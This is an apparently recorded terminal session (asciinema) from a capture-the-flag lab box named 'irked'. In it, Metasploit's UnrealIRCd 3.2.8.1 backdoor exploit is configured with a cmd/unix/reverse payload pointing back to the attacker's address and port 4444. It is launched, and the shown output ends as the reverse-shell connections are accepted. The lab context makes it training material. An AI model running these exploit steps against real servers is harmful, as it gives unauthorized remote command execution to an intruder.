[45.298769, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:07 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[42;56H"]
[46.298171, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:08 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[42;56H"]
[47.116425, "o", "p"]
[47.121499, "o", "ayload/cmd/unix/reverse"]
[47.272797, "o", "\r\n"]
[47.295881, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:09 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[43;1H"]
[47.356362, "o", "\u001b[4mmsf6\u001b(B\u001b[m payload(\u001b[31m\u001b[1mcmd/unix/reverse\u001b(B\u001b[m) > "]
[48.299717, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:10 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[43;34H"]
[49.303171, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:11 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[43;34H"]
[49.721505, "o", "use payload/cmd/unix/reverse"]
[50.302665, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:12 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[43;62H"]
[50.319674, "o", "\u001b[28D\u001b[1P\u001b[1P\u001b[1P\u001b[1P\u001b[1P\u001b[1P\u001b[1P\u001b[1P\u001b[1P\u001b[1P\u001b[1P\u001b[1P\u001b[1P\u001b[1P\u001b[1Pshow payloads"]
[50.919957, "o", "\u001b[12Det RPORT 6697"]
[51.300878, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:13 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[43;48H"]
[51.429038, "o", "Interrupt: use the 'exit' command to quit\r\n"]
[51.494891, "o", "\u001b[4mmsf6\u001b(B\u001b[m payload(\u001b[31m\u001b[1mcmd/unix/reverse\u001b(B\u001b[m) > "]
[51.699839, "o", "u"]
[51.787431, "o", "s"]
[51.834687, "o", "e"]
[51.968873, "o", " "]
[52.302192, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:14 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[44;38H"]
[53.301163, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:15 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[44;38H"]
[53.837528, "o", "u"]
[53.837842, "o", "ni"]
[53.837979, "o", "x"]
[53.838097, "o", "/"]
[53.838273, "o", "i"]
[53.838428, "o", "r"]
[53.838663, "o", "c"]
[53.838856, "o", "/"]
[53.839003, "o", "u"]
[53.839221, "o", "n"]
[53.839452, "o", "r"]
[53.839722, "o", "e"]
[53.840005, "o", "a"]
[53.840183, "o", "l"]
[53.840323, "o", "_"]
[53.840712, "o", "i"]
[53.840894, "o", "r"]
[53.841201, "o", "c"]
[53.841482, "o", "d"]
[53.841713, "o", "_"]
[53.841907, "o", "3"]
[53.842086, "o", "2"]
[53.842354, "o", "8"]
[53.842584, "o", "1"]
[53.843197, "o", "_"]
[53.843471, "o", "b"]
[53.843763, "o", "a"]
[53.843954, "o", "c"]
[53.844218, "o", "k"]
[53.844495, "o", "d"]
[53.844683, "o", "o"]
[53.844951, "o", "o"]
[53.845185, "o", "r"]
[54.017479, "o", "\r\n"]
[54.301338, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:16 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[45;1H"]
[54.31654, "o", "\u001b[4mmsf6\u001b(B\u001b[m exploit(\u001b[31m\u001b[1munix/irc/unreal_ircd_3281_backdoor\u001b(B\u001b[m) > "]
[55.110384, "o", "s"]
[55.233757, "o", "e"]
[55.301305, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:17 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[45;54H"]
[55.430819, "o", "t"]
[55.480761, "o", " "]
[55.613215, "o", "p"]
[55.768897, "o", "a"]
[55.859114, "o", "y"]
[56.072733, "o", "l"]
[56.217128, "o", "o"]
[56.261678, "o", "a"]
[56.30414, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:18 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[45;62H"]
[56.327968, "o", "d"]
[56.424672, "o", " "]
[57.302654, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:19 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[45;64H"]
[58.301719, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:20 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[45;64H"]
[58.950719, "o", "p"]
[58.950915, "o", "a"]
[58.951198, "o", "y"]
[58.95154, "o", "l"]
[58.951813, "o", "o"]
[58.952094, "o", "a"]
[58.952541, "o", "d"]
[58.952771, "o", "/"]
[58.953075, "o", "c"]
[58.953275, "o", "m"]
[58.953439, "o", "d"]
[58.953561, "o", "/"]
[58.953752, "o", "u"]
[58.953893, "o", "n"]
[58.954024, "o", "i"]
[58.954154, "o", "x"]
[58.954302, "o", "/"]
[58.954457, "o", "r"]
[58.954614, "o", "e"]
[58.954795, "o", "v"]
[58.954948, "o", "e"]
[58.955087, "o", "r"]
[58.955555, "o", "s"]
[58.956095, "o", "e"]
[59.145428, "o", "\r\n"]
[59.16274, "o", "payload => cmd/unix/reverse\r\n"]
[59.226981, "o", "\u001b[4mmsf6\u001b(B\u001b[m exploit(\u001b[31m\u001b[1munix/irc/unreal_ircd_3281_backdoor\u001b(B\u001b[m) > "]
[59.303381, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:21 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[47;52H"]
[60.303191, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:22 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[47;52H"]
[61.223964, "o", "s"]
[61.30534, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:23 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[47;53H"]
[61.337151, "o", "h"]
[61.413024, "o", "o"]
[61.505992, "o", "w"]
[61.593668, "o", " "]
[61.701867, "o", "o"]
[61.773689, "o", "p"]
[61.863798, "o", "t"]
[62.010177, "o", "i"]
[62.022008, "o", "o"]
[62.119742, "o", "n"]
[62.209618, "o", "s"]
[62.286812, "o", "\r\n"]
[62.301603, "o", "\r\nModule options (exploit/unix/irc/unreal_ircd_3281_backdoor):\u001b[51;1H   Name    Current Setting  Required  Description\r\n   ----    ---------------  --------  -----------\r\n   RHOSTS  10.10.10.117     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit\r\n   RPORT   6697             yes       The target port (TCP)\u001b[56;1H"]
[62.304707, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:24 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[56;1H"]
[62.305062, "o", "\r\nPayload options (cmd/unix/reverse):\u001b[59;1H   Name   Current Setting  Required  Description\r\n   ----   ---------------  --------  -----------\r\n   LHOST                   yes       The listen address (an interface may be specified)\r\n   LPORT  4444             yes       The listen port\u001b[65;1HExploit target:\u001b[67;1H   Id  Name\r\n   --  ----\r\n   0   Automatic Target\u001b[72;1H"]
[62.376541, "o", "\u001b[4mmsf6\u001b(B\u001b[m exploit(\u001b[31m\u001b[1munix/irc/unreal_ircd_3281_backdoor\u001b(B\u001b[m) > "]
[63.306041, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:25 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[72;52H"]
[64.305387, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:26 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[72;52H"]
[64.773017, "o", "s"]
[64.903751, "o", "e"]
[65.10494, "o", "t"]
[65.213515, "o", " "]
[65.305792, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:27 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[72;56H"]
[65.509889, "o", "L"]
[65.673636, "o", "H"]
[65.748025, "o", "O"]
[65.794823, "o", "S"]
[65.890767, "o", "T"]
[66.059071, "o", " "]
[66.305243, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:28 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[72;62H"]
[66.305796, "o", "t"]
[66.355023, "o", "u"]
[66.427956, "o", "n"]
[66.612883, "o", "0"]
[66.761558, "o", "\r\n"]
[66.773163, "o", "LHOST => 10.10.14.17\r\n"]
[66.842044, "o", "\u001b[4mmsf6\u001b(B\u001b[m exploit(\u001b[31m\u001b[1munix/irc/unreal_ircd_3281_backdoor\u001b(B\u001b[m) > "]
[67.304816, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:29 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[74;52H"]
[67.488148, "o", "e"]
[67.664509, "o", "x"]
[67.704231, "o", "p"]
[67.770704, "o", "l"]
[67.975948, "o", "o"]
[68.145803, "o", "i"]
[68.226078, "o", "t"]
[68.285608, "o", "\r\n"]
[68.305313, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:30 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[75;1H"]
[68.322751, "o", "\r\n"]
[68.323403, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Started reverse TCP double handler on 10.10.14.17:4444 \r\n"]
[68.36243, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m 10.10.10.117:6697 - Connected to 10.10.10.117:6697...\r\n"]
[68.399523, "o", "    :irked.htb NOTICE AUTH :*** Looking up your hostname...\r\n"]
[68.400217, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m 10.10.10.117:6697 - Sending backdoor command...\r\n"]
[69.305346, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:31 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[80;1H"]
[70.307811, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:32 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[80;1H"]
[71.311507, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:33 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[80;1H"]
[72.311174, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:34 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[80;1H"]
[73.314553, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:35 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[80;1H"]
[74.315519, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:36 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[80;1H"]
[75.314747, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:37 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[80;1H"]
[76.314635, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:38 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[80;1H"]
[77.313977, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:39 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[80;1H"]
[77.451981, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Accepted the first client connection...\r\n"]
[77.452361, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Accepted the second client connection..."]
[77.452619, "o", "\r\n"]
[77.704198, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Command: echo fyeqr5ZxANc8Udqf;\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[77.704503, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[A\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Writing to socket A\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
